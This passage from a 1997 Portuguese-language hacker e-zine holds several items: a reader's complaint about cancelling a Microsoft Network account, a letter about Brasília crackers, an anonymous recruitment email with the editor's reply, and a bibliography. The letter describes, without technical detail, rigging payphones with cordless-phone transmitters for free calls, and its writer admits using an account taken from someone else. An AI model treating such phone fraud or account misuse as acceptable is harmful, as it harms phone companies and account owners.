PROJETOS. O DE COLOCAR LINKS DE BRASILEIROS NO BE VAI FICAR PRO PROXIMO NUMERO. COM O PROBLEMA DO TOP_QUARK, RESOLVI QUE QUALQUER PROJETO DO BE TEM QUE SER LEVADO EM CONSIDERACAO A LEI DE MURPHY. UM OUTRO PROJETO E' VISITAR ALGUNS LOCAIS DE ENCONTROS DE HACKERS AQUI NO BRASIL. TUDO DEPENDENDO DE UMAS COISAS QUE NA ULTIMA HORA PODEM RESOLVER NAO FUNCIONAR... +++++++++++++++++++++++++++++++++++++ O DESFECHO DO CASO Do MICROSOFT NETWORK submeta informatica-jb, www-jb, ciberespaco, internet, solucionatica-jb Amigos, Conforme prometido, passo o relato abaixo, de como resolvi, da forma um pouco CARA, mas DE VEZ, o problema enfrentado (e relatado anteriormente), na Microsoft Network. HOJE, o "suporte telefonico" da Microsoft no Brasil, que deu OCUPADO varias vezes, a seguir, me deixou "PENDURADO"ouvindo uma musiquinha, por varios minutos, a qual, CERTAMENTE, nao poderia me ajudar. Ao ser atendido pela, Sra. KELLY (011-8710090 12:20h, HORARIO DE BRASILIA), me foi dito, pela mesma, que iria checar meu cadastro pelo numero do meu telefone, aguardei cerca de 15minutos (ligacao INTERURBANA, de Recife para Sao Paulo) mas, ela NUNCA RETORNOU. A ligacao CAIU, afinal. Insisti, atraves de OUTRA LIGACAO, mais musiquinha, por cerca de 12 minutos, e o SR. SANDRO, me disse que, INFELIZMENTE, o suporte TECNICO nao poderia fazer nada, e que eu teria que entrar em contato com a AREA COMERCIAL, no telefone (011-8225764). Sra Juciane (da area comercial), me disse que o CANCELAMENTO do "NETWORK", tinha que ser feito nos EUA, no numero 00-1-813-5791668. Perguntei se era um NUMERO GRATIS (tipo 0800), mas ela afirmou que "NAO SABIA INFORMAR". E preciso se registrar, que TODOS os acima, foram SUPER EDUCADOS (embora, tambem fossem MUITO BEM TRATADOS POR MIM). Quando liguei para os Estados Unidos ADIVINHEM: GRAVACAO POR MAIS 12 MINUTOS(LIGACAO INTERNACIONAL). A exemplo das outras ligacoes (so que agora em INGLES): "sorry, all our attendants are presently attending other MSN MEMBERS. WE APPRECIATE YOU PATIENCE. You will be attended by the next available agent". Perguntava-me: QUANDO? Esperei uns 10 minutos (EM UMA LIGACAO INTERNACIONAL, REPITO), quando fui, FINALMENTE, atendido pelo Sr. Oliver, TAMBEM, muito educado, QUE RESOLVEU o meu problema, DEBITANDO ao meu novo cartao o valor de US$ 281.00 e ENCERRANDO MINHA CONTA, conforme solicitado por mim. Eu, obviamente, protestei, pelo fato de NAO TER ACESSADO A REDE, A NAO SER PARA DOWNLOAD DO PROPRIO SOFTWARE DE ACESSO A ELS, VIA INTERNET, TODAS AS VARIAS VEZES QUE TIVE QUE REINSTALAR O WIN95, em portugues, no meu computador, mas como queria EVITAR MAIORES PROBLEMASNO MOMENTO, pedi-lhe que voce em frente, mas que ME ASSEGURA-SE que a conta seria, DEFINITIVAMENTE, ENCERRADA . Vale salientar que ANTES DISSO, o mesmo me falou algumas coisas interessantes: 1. Nao seria necessario EU ligar para eles, ANTES, CANCELANDO A CONTA? 2. Nao era um pouco TARDE, para eu ligar agora, pleiteando NAO PAGAR (mesmo apesar de NAO TER USADO? 3. Perguntou-me tambem, se eu EFETIVAMENTE, nao tinha usado a NETWORK, ao qual respondi, por OBVIAS RAZOES MORAIS, que APENAS FIZ O DOWNLOAD DO SOFTWARE DE ACESSO, A PROPRIA NETWORK (que para os DESAVISADOS, e feito VIA MODEM, ligacao INTERNACIONAL, e toda vez que se faz uma reinstalacao do window95, por qualquer razao tecnica, alem de demorar cerca de 30 minutos, cada DOWNLOAD). Ai quem perguntou fui eu: e ELES, nao deveriam, PELO MENOS, passar um email para o seus usuarios dizendo: "VOCE ESTA SENDO DEBITADO, mas nao esta usando"? Ou melhor: depois de uns 60 dias, ENCERRAR a conta, simplesmente? 4. Que a partir de Janeiro, o acesso ao suporte da MSN, nos EUA, em Espanhol, nao mais existira (eu disse para ele, que EU ate, que poderia resolver em INGLES, MAS SERIA JUSTO, que a maioria doss brasileiros nao tivessem um SUPORTE AQUI???)!!! Parece-me que, JA QUE COMPREI UM PRODUTO EM PORTUGUES, deveria ter um suporte "MAIS RAZOAVEL", nao e? E aqueles, que nao tem acesso a lingua Inglesa, e/ou a ligacoes INTERURBANAS E INTERNACIONAIS? E como bem disse um caro amigo: OLHA QUE EU, SEMPRE, QUIZ RESOLVER O ASSUNTO, SEM DISCUSSAO. Imaginem se eu fosse (COM MUITA RAZAO), brigar pelos US$ 281.00? O que seria de mim??? Acho que os DEMAIS usuarios TEM DIREITO A SABER DA MINHA EXPERIENCIA, e por esta razao, faco este relato, esperando que o mesmo lhes seja util. Grande abraco, E v a l d o W. ex-usuario da The Microsoft Network ADENDO: SE A MICROSOFT QUISER DIVULGAR ALGUMA NOTA COMENTANDO ACIMA, SAI NO PROXIMO BE. Subject: It BrasLlia, 18 de janeiro de 1997 Caro Derneval, Aqui no Itama&&Y, houve um debate sobre a censura da internet, conclus^So: o governo n^So quer controlar a internet no Brasil, quer deixa- la a solta, o que eles querem controlar s^So os provedores de acesso e melhorar o sistema de vigilancia telefonica aqui no Brasil principalmete no Distrito federal, aqui onde os crackers sao os filhos e sobrinhos dos parlamentares, ele tem acesso a muita informaA^So util, os seus crackerzinhos vao na telebrasilia(igual a telesp ai) e na embratel e pegam,mexem remexem nas bibliotecas, sabem como funciona a transmissao de sinais e ainda eles tem informacoes da policia federal de GRA+A!!! Alguns sao gentils nao saem vandalizando tudo, so as bbs da vida, H... aqui as coisas sao assim. Gostei do artigo sobre Phreaker, gostaria de acrecentar que aqui em brasilia poucos sabotam os telefones azuis, nem os vermelho nem os de cartao da' muito trabalho, aqui o pessoal que "Saca" compra um telefone destes sem fio(tipo made in Paraguai) faz uma adaptac^So( que nao sei como se faz e se viesse a saber nao diria). Coloca o transmissor no telefone(azul,vermelho ou de cartao) e pronto! faz-se varias ligacoes e nao se paga, para a companhia telefonica localizar isto leva trabalho mas tem como , utilizando um scanner de sinais e um analizador de espectro, mais informacoes voce pode ter sobre como Shimomura prendeu kevin( O pirata eletronico e o samurai, nao lembro a editora nem o autor). So' que tem mais quem saber fazer isso nao faz, e quem faz(tentando copiar o circuito de uma revistina de eletronica qualquer) e' preso, "torturado",etc... Bem ja'vou indo, outra coisa esta conta nao e'minha, e'de um cara que ja'peguei antes. e se quizer publicar meu e-mail na BE tudo bem, mas sem colocar minhas indentificacoes do e-mail como nome, endereco, senao e'o nome do dono da conta que vai ficar sujo e nao eu. Atenciosamente, TINNY TOON --------------------------------------- Subject: Proposta Bom voce nao me conhece e eu nao te conheco, e espero que voce nao divulgue este mail. Estou em um projeto governamental, o qual seu objetivo e' manter a integridade de suas informacoes, ou seja manter informacoes sigilosas do governo longe de hackers idiotas, gostaria de saber se ha interesse de participar deste projeto ? Agradeco desde ja sua atencao. MD. RESPOSTA: O que eu acho incrivel e' que o cara nao so' me mandou esta carta nao criptografada (tudo bem, nao to lendo carta criptografada de ninguem, atualmente) e ainda por cima de um servidor famoso. Quer dizer, se o cara e' do governo ou trabalha pro governo, como e' que nao tem conta internet num gov.br da vida? Se nao e' pra divulgar tambem, porque nao criptografou. E nem falou em grana.. Por ultimo, todo mundo com um pouco de cerebro sabe que ninguem trabalha pro governo sem ser concursado. Os que nao sao concursados trabalham p. uma faccao do governo, que pode ser deputado fulano de tal, ciclano de tal ou ate' um "Bob Fields" da vida... --------------------------------------------------- BIBLIOGRAFIA ============ A piada do texto estenografia foi enviada para a lista de piadas-l por Matheus O artigo de esteganografia foi baseado em busca pelo Yahoo e Lycos (palavra chave Steganography) alem de trechos do livro "The Code-breakers" do Khan O artigo sobre o Mitnick foi tirado da pagina do mesmo (sem permissao) no http://www.2600.com Os faqs dos encontros foram tirados do alt.2600 Links e lances do genero estao detalhados em seus respectivos lugares. A entrevista foi retirada do numero 1 da revista argentina "Virus Report", hoje extinta. Para assinar a lista MeuPovo, envie msg para MAJORDOMO@ACTECH.COM.BR, contendo,na 1a linha da msg, o texto: SUBSCRIBE MEUPOVO -----------------------------------------------